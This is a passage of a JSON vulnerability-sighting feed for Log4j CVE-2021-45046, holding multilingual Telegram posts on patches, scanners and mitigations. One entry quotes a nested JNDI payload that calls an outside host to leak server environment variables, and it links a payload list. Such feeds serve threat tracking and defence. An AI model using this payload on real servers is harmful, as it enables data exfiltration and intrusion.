16 \u043d\u0435 \u0432\u0441\u0435\u0433\u0434\u0430 \u0437\u0430\u0449\u0438\u0449\u0430\u0435\u0442 \u043e\u0442 \u043d\u0435\u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0438\u0440\u0443\u0435\u043c\u043e\u0439 \u0440\u0435\u043a\u0443\u0440\u0441\u0438\u0438 \u043f\u0440\u0438 \u0441\u0430\u043c\u043e\u0440\u0435\u0444\u0435\u0440\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u043c \u043f\u043e\u0438\u0441\u043a\u0435\nJNDI, \u043a\u043e\u0442\u043e\u0440\u044b\u0439, \u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c \u0431\u044b, \u0431\u044b\u043b \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d \u0432 \u0432\u0435\u0440\u0441\u0438\u0438 2. 16, \u043d\u043e \u043e\u0441\u0442\u0430\u0432\u0430\u043b\u0441\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u043c \u043f\u0440\u0438 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0445 \u043e\u0431\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0430\u0445 \u0438 \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u043b \u043a \u043e\u0448\u0438\u0431\u043a\u0435\nStackOverflowError. \u0412\u0435\u0440\u0441\u0438\u044f\n\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u0430 \u043d\u0430 \u043a\u0440\u0443\u043f\u043d\u0435\u0439\u0448\u0435\u043c\nJava-\u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438 -\nMaven Central. \u0412\u044b\u043f\u0443\u0441\u043a 2. 12. 
3 \u0442\u0430\u043a\u0436\u0435 \u043d\u0430 \u043f\u043e\u0434\u0445\u043e\u0434\u0435 \u0434\u043b\u044f \u0442\u0435\u0445, \u043a\u0442\u043e \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0432 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0432\u0435\u0442\u043a\u0438 \u0410\u0431\u0441\u0442\u0440\u0430\u0433\u0438\u0440\u0443\u044f\u0441\u044c \u043e\u0442 \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043f\u043e\n\u0434\u0430\u043d\u043d\u044b\u043c\nGoogle, \u0431\u043e\u043b\u0435\u0435 35 000 \u043f\u0430\u043a\u0435\u0442\u043e\u0432\nJava \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438\nlog4j, \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0438\u0445 \u0431\u043e\u043b\u0435\u0435 8 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u044f\nMaven\nCentral. \u0411\u043e\u043b\u044c\u0448\u0430\u044f \u0447\u0430\u0441\u0442\u044c \u0438\u0437 \u043f\u0430\u043a\u0435\u0442\u043e\u0432 \u0437\u0430\u0438\u043c\u0441\u0442\u0432\u0443\u044e\u0442 \u0431\u0430\u0433\u0438\nlog4j \u00ab\u043a\u043e\u0441\u0432\u0435\u043d\u043d\u043e\u00bb \u043f\u043e \u043f\u0440\u0438\u043d\u0446\u0438\u043f\u0443 \u0442\u0440\u0430\u043d\u0437\u0438\u0442\u0438\u0432\u043d\u043e\u0439 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0438. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0438\u0437 35 863 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445\nGoogle \u043f\u0430\u043a\u0435\u0442\u043e\u0432, \u043e\u043a\u043e\u043b\u043e 7000 \u0437\u0430\u0438\u043c\u0441\u0442\u0432\u043e\u0432\u0430\u043b\u0438\nlog4j \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e. 
\u0423\u0447\u0438\u0442\u044b\u0432\u0430\u044f \u043f\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u0438 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438\nGoogle \u043f\u0440\u043e\u0433\u043d\u043e\u0437\u0438\u0440\u0443\u044e\u0442, \u0447\u0442\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u043e\u0432 log4j \u0437\u0430\u0442\u044f\u043d\u0435\u0442\u0441\u044f \u043d\u0430 \u0433\u043e\u0434\u044b. \n \u0422\u0435\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u0435\u043c, \u0432 \u043d\u044b\u043d\u0435\u0448\u043d\u0438\u0445 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445 \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043e \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u0439\nlog4j \u0438 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0442\u044c \u043c\u043e\u043d\u0438\u0442\u043e\u0440\u0438\u0442\u044c\nApache \u043d\u0430 \u043f\u0440\u0435\u0434\u043c\u0435\u0442 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439.   
@biznesovyy_zhurnal\n    \u0422\u0430\u043a\u0436\u0435 \u043f\u043e \u044d\u0442\u043e\u0439 \u0442\u0435\u043c\u0435 \u043c\u043e\u0436\u0435\u0442\u0435 \u043f\u043e\u0447\u0438\u0442\u0430\u0442\u044c https://t.me/ehkho_ot_mosvy/21746", "creation_timestamp": "2021-12-20T13:35:36.000000Z"}, {"uuid": "20002ee0-4c53-4bfa-8027-f6b32899c9f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/tech_b0lt_Genona/2947", "content": "\u041c\u044b \u0434\u0443\u043c\u0430\u043b\u0438, \u0447\u0442\u043e \u0432\u0441\u0451, \u043d\u043e \u044d\u0442\u043e \u043d\u0435 \u0432\u0441\u0451. \u0422\u0435\u043f\u0435\u0440\u044c \u0441 log4j \u0435\u0449\u0451 \u0434\u043e\u043b\u0433\u043e \u0432\u0440\u0435\u043c\u044f \u043d\u0435 \u0441\u043b\u0435\u0437\u0443\u0442. \u041f\u043e\u043a\u0430 \"\u0432\u0441\u0435\" \u0431\u0430\u0433\u0438 \u0442\u0430\u043c \u043d\u0435 \u043d\u0430\u0439\u0434\u0443\u0442.\n\nLog4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046)\nhttps://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/\n+\nIt was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack. Log4j 2.15.0 restricts JNDI LDAP lookups to localhost by default. Note that previous mitigations involving configuration such as to set the system property `log4j2.noFormatMsgLookup` to `true` do NOT mitigate this specific vulnerability. 
Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default. This issue can be mitigated in prior releases (<2.16.0) by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-45046", "creation_timestamp": "2021-12-15T09:21:34.000000Z"}, {"uuid": "5987ddaa-2889-44b1-a826-92ed775b4c20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/tech_b0lt_Genona/2965", "content": "\u0412\u0441\u0442\u0440\u0435\u0447\u0430 \u0441 CVE-2021-44228 \u0438\u043c\u0435\u043d\u0438 Log4j2 \u0432 \u043d\u0435\u043e\u0436\u0438\u0434\u0430\u043d\u043d\u043e\u043c \u043c\u0435\u0441\u0442\u0435\n\n> After the initial fix in Log4j v2.15 was released, a new issue CVE-2021-45046 was found and addressed in log4j v2.16. 
We have since released Arduino IDE 1.8.18, available here, which includes log4j v2.16 with the latest fix.\n\nArduino's response to Log4j2 vulnerability CVE-2021-44228\nhttps://support.arduino.cc/hc/en-us/articles/4412377144338-Arduino-s-response-to-Log4j2-vulnerability-CVE-2021-44228", "creation_timestamp": "2022-01-04T11:40:02.000000Z"}, {"uuid": "a82d93bb-7e70-4c37-9ee1-58e6edaf5aed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=1833", "content": "", "creation_timestamp": "2026-04-21T21:00:00.000000Z"}, {"uuid": "208b1bed-59b2-4259-8743-b3e7a0b720d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/ics_cert/507", "content": "\u0641\u0648\u0631\u06cc: \u0628\u0646\u06cc\u0627\u062f \u0622\u067e\u0627\u0686\u06cc \u0648\u0635\u0644\u0647 \u062c\u062f\u06cc\u062f\u06cc (CVE-2021-45046) \u0628\u0631\u0627\u06cc \u0627\u0628\u0632\u0627\u0631 #Log4j \u0645\u0646\u062a\u0634\u0631 \u06a9\u0631\u062f\u0647 \u0627\u0633\u062a\u060c \u067e\u0633 \u0627\u0632 \u0627\u06cc\u0646\u06a9\u0647 \u0648\u0635\u0644\u0647 \u0642\u0628\u0644\u06cc \u0628\u0631\u0627\u06cc \u0628\u0647\u0631\u0647 \u0628\u0631\u062f\u0627\u0631\u06cc #Log4Shell \u0627\u062e\u06cc\u0631\u0627\u064b \u0641\u0627\u0634 \u0634\u062f\u0647 (CVE-2021-44228) \u062f\u0631 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u0647\u0627\u06cc \u063a\u06cc\u0631 \u067e\u06cc\u0634 \u0641\u0631\u0636 \u0646\u0627\u0642\u0635 \u062a\u0644\u0642\u06cc \u0634\u062f.\n\n \u062c\u0632\u0626\u06cc\u0627\u062a: https://lnkd.in/eFjkK6Zv\n\n #infosec #\u0627\u0645\u0646\u06cc\u062a \u0633\u0627\u06cc\u0628\u0631\u06cc #\u0627\u0645\u0646\u06cc\u062a 
\u06a9\u0627\u0645\u067e\u06cc\u0648\u062a\u0631\u06cc #\u0641\u0646\u0627\u0648\u0631\u06cc\n\n\ud83d\udc6e\u200d\u2640\ufe0f\ud83d\udc6e\u200d\u2640\ufe0f \u0628\u0627\u0632\u0646\u0634\u0631 \u0645\u0637\u0627\u0644\u0628 \u0627\u06cc\u0646 \u06a9\u0627\u0646\u0627\u0644 \u0635\u0631\u0641\u0627 \u0628\u0627 \u0630\u06a9\u0631 \u0645\u0646\u0628\u0639 \u0648 \u0622\u062f\u0631\u0633 \u06a9\u0627\u0645\u0644 \u06a9\u0627\u0646\u0627\u0644 \u0645\u062c\u0627\u0632 \u0645\u06cc\u0628\u0627\u0634\u062f.\n\n\ud83c\udfed\u0648\u0628\u0633\u0627\u06cc\u062a \u0648 \u06a9\u0627\u0646\u0627\u0644 \u062a\u062e\u0635\u0635\u06cc \u0627\u0645\u0646\u06cc\u062a \u0632\u06cc\u0631\u0633\u0627\u062e\u062a\u0647\u0627\u06cc \u0627\u062a\u0648\u0645\u0627\u0633\u06cc\u0648\u0646 \u0648 \u06a9\u0646\u062a\u0631\u0644 \u0635\u0646\u0639\u062a\u06cc\n\n\u0627\u062f\u0645\u06cc\u0646:\nhttps://t.me/pedram_kiani\n\u06a9\u0627\u0646\u0627\u0644 \u062a\u0644\u06af\u0631\u0627\u0645:\nhttps://t.me/ics_cert", "creation_timestamp": "2021-12-15T12:20:56.000000Z"}, {"uuid": "86504ec9-4cad-473f-95c6-1023993ff58c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/komissar_katani/98053", "content": "\u0422\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043d\u0430 \u043f\u0440\u043e\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u0435 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 Apache log4j\n\n Log4jshell CVE-2021-44228 \u0418\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441 JNDI \u0432 Apache Log4j2 2.0-beta9 (\u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0438 2.14.1) \u0432 \u043a\u043e\u043c\u0431\u0438\u043d\u0430\u0446\u0438\u0438 \u0441 
\u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u043e\u043c LDAP \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u043e\u0442\u043a\u0443\u0434\u0430 \u0443\u0433\u043e\u0434\u043d\u043e. \u0425\u0430\u043a\u0435\u0440 \u043c\u043e\u0436\u0435\u0442 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f\u043c\u0438 \u0436\u0443\u0440\u043d\u0430\u043b\u0430 \u0438\u043b\u0438 \u0438\u0445 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430\u043c\u0438 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434, \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0439 \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 LDAP. CVE-2021-45046 \u0411\u044b\u043b\u043e \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043e, \u0447\u0442\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0430\u0434\u0440\u0435\u0441\u0430 CVE-2021-44228 \u0432 Apache Log4j 2.15.0 \u0431\u044b\u043b\u043e \u043d\u0435\u043f\u043e\u043b\u043d\u044b\u043c \u043f\u0440\u0438 \u0432\u044b\u0431\u043e\u0440\u0435 \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043a \u043d\u0435 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e. 
\u0415\u0441\u043b\u0438 \u043f\u0440\u0438 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0436\u043e\u043d\u0433\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043d\u0435\u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0439 \u0448\u0430\u0431\u043b\u043e\u043d \u0441 \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u043d\u044b\u043c \u043f\u043e\u0438\u0441\u043a\u043e\u043c (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u00ab$${ctx:LoginID}\u00bb), \u0445\u0430\u043a\u0435\u0440\u044b, \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0438\u0440\u0443\u044e\u0449\u0438\u0435 \u0432\u0445\u043e\u0434\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 Thread Context Map (MDC), \u0441\u043f\u043e\u0441\u043e\u0431\u043d\u044b \u0434\u043e\u0431\u0430\u0432\u0438\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u044d\u043b\u0435\u043c\u0435\u043d\u0442\u044b \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0448\u0430\u0431\u043b\u043e\u043d\u0430 JNDI Lookup. \u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0443\u0442\u0435\u0447\u043a\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0438 \u0434\u0430\u0451\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b... 
\n\n http://forumpolitika.org/component/k2/item/87406 \n\n\u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a: @politicheskie_panchi \u0438 @kz_vzglyd", "creation_timestamp": "2023-08-11T01:57:33.000000Z"}, {"uuid": "ab35c788-8a1c-4dab-85f3-ffe3149dd852", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/BleepingComputer/11213", "content": "CISA releases Apache Log4j scanner to find vulnerable apps\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has announced the release of a scanner for identifying web services impacted by two Apache Log4j remote code execution vulnerabilities, tracked as CVE-2021-44228 and CVE-2021-45046. [...]\n\nhttps://www.bleepingcomputer.com/news/security/cisa-releases-apache-log4j-scanner-to-find-vulnerable-apps/", "creation_timestamp": "2021-12-22T16:57:09.000000Z"}, {"uuid": "94c93555-875d-49cd-8cf0-28b22ad3103b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/mosqua_na_mosque_reke/52012", "content": "\u0422\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043d\u0430 \u043f\u0440\u043e\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u0435 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 Apache log4j\n\n Log4jshell CVE-2021-44228 \u0418\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441 JNDI \u0432 Apache Log4j2 2.0-beta9 (\u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0438 2.14.1) \u0432 \u043a\u043e\u043c\u0431\u0438\u043d\u0430\u0446\u0438\u0438 \u0441 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u043e\u043c LDAP \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 
\u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u043e\u0442\u043a\u0443\u0434\u0430 \u0443\u0433\u043e\u0434\u043d\u043e. \u0425\u0430\u043a\u0435\u0440 \u043c\u043e\u0436\u0435\u0442 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f\u043c\u0438 \u0436\u0443\u0440\u043d\u0430\u043b\u0430 \u0438\u043b\u0438 \u0438\u0445 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430\u043c\u0438 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434, \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0439 \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 LDAP. CVE-2021-45046 \u0411\u044b\u043b\u043e \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043e, \u0447\u0442\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0430\u0434\u0440\u0435\u0441\u0430 CVE-2021-44228 \u0432 Apache Log4j 2.15.0 \u0431\u044b\u043b\u043e \u043d\u0435\u043f\u043e\u043b\u043d\u044b\u043c \u043f\u0440\u0438 \u0432\u044b\u0431\u043e\u0440\u0435 \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043a \u043d\u0435 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e. 
\u0415\u0441\u043b\u0438 \u043f\u0440\u0438 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0436\u043e\u043d\u0433\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043d\u0435\u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0439 \u0448\u0430\u0431\u043b\u043e\u043d \u0441 \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u043d\u044b\u043c \u043f\u043e\u0438\u0441\u043a\u043e\u043c (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u00ab$${ctx:LoginID}\u00bb), \u0445\u0430\u043a\u0435\u0440\u044b, \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0438\u0440\u0443\u044e\u0449\u0438\u0435 \u0432\u0445\u043e\u0434\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 Thread Context Map (MDC), \u0441\u043f\u043e\u0441\u043e\u0431\u043d\u044b \u0434\u043e\u0431\u0430\u0432\u0438\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u044d\u043b\u0435\u043c\u0435\u043d\u0442\u044b \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0448\u0430\u0431\u043b\u043e\u043d\u0430 JNDI Lookup. \u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0443\u0442\u0435\u0447\u043a\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0438 \u0434\u0430\u0451\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b... 
\n\n http://forumpolitika.org/component/k2/item/87406 \n\n\u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a: @fib_name \u0438 @tass_kgb", "creation_timestamp": "2023-08-12T19:09:56.000000Z"}, {"uuid": "493a7c66-20c4-49ee-a065-6d895f212109", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "Telegram/EYkASGxj3Tiuz3kIHRMz13gpRd2GwQ5wKmXB5D8I7ZTChs4", "content": "", "creation_timestamp": "2025-07-23T21:00:04.000000Z"}, {"uuid": "d7b99691-428f-4eba-a00d-e50536189cce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/alexmakus/4446", "content": "\u0411\u043e\u043b\u044c\u0448\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 log4j \u0431\u043e\u0433\u0443 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439! 
\n\nhttps://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/", "creation_timestamp": "2021-12-15T11:24:18.000000Z"}, {"uuid": "a24f6248-24cc-4076-a662-240cb0e87022", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/beaverdreamer/36", "content": "#log4j #slowpoke\n\u041e\u0431\u0449\u0438\u0435 \u0441\u0442\u0430\u0442\u044c\u0438:\nhttps://www.lunasec.io/docs/blog/log4j-zero-day/\nhttps://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/\n\n\u0421\u0442\u0430\u0442\u044c\u044f \u0441 \u0442\u043e\u0447\u043a\u0438 \u0437\u0440\u0435\u043d\u0438\u044f \u0437\u0430\u0449\u0438\u0442\u044b (\u043d\u043e \u043c\u043e\u0436\u043d\u043e \u0432\u0437\u044f\u0442\u044c \u043f\u0435\u0439\u043b\u043e\u0430\u0434\u043e\u0432):\nhttps://securityblue.team/log4j-hunting-and-indicators/\n\n\u041e\u0431\u0445\u043e\u0434\u043d\u044b\u0435 \u0441\u043f\u043e\u0441\u043e\u0431\u044b \u0437\u0430\u0449\u0438\u0442\u044b: https://www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide\n\nJDK versions greater than 6u211, 7u201, 8u191, and 11.0.1 are not affected by the LDAP attack vector. \n\n\nIn case anyone hasn't discovered this. 
The Log4J formatting is nestable which means payloads like\n ${jndi:ldap://${env:user}.xyz.collab.com/a} \nWill leak server side env vars!\n\n\u0412\u0430\u0440\u0438\u0430\u043d\u0442\u044b \u043f\u0435\u0439\u043b\u043e\u0430\u0434\u043e\u0432:\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/blob/0d6d6049ce03272d6e934247ab57263bc04ea625/CVE%20Exploits/Log4Shell.md", "creation_timestamp": "2024-03-04T10:40:25.000000Z"}, {"uuid": "0ce15428-2bdb-49e5-9b73-6fb663648ae7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "Telegram/vHTtKQxmAT3f8pPJYMyZLW3MJn_6GFVTdkZIulMbNHlsBg", "content": "", "creation_timestamp": "2023-11-22T10:27:55.000000Z"}, {"uuid": "4671acc4-858b-4a93-9bd5-c6c30fd68dc0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/ctinow/43919", "content": "Second Log4j Vulnerability (CVE-2021-45046) Discovered \u2014 New Patch Released\n\nhttps://ift.tt/3IT5WFC", "creation_timestamp": "2021-12-15T06:36:05.000000Z"}, {"uuid": "56d63151-918c-4309-98e9-8ad25be20986", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/KomunitiSiber/136", "content": "Alert: Active Exploitation of TP-Link, Apache, and Oracle Vulnerabilities Detected\nhttps://thehackernews.com/2023/05/active-exploitation-of-tp-link-apache.html\n\nThe U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) has\u00a0added\u00a0three flaws to the Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.\nThe security vulnerabilities are as follows -\n\nCVE-2023-1389\u00a0(CVSS score: 8.8) - TP-Link Archer AX-21 Command Injection Vulnerability\nCVE-2021-45046\u00a0(CVSS score: 9.0) - Apache Log4j2 Deserialization of Untrusted", "creation_timestamp": "2023-05-02T08:03:43.000000Z"}, {"uuid": "17b91d97-f58a-4fd4-8771-5a93a93f8450", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/arpsyndicate/4393", "content": "#ExploitObserverAlert\n\nCVE-2021-45046\n\nDESCRIPTION: Exploit Observer has 318 entries in 20 file formats related to 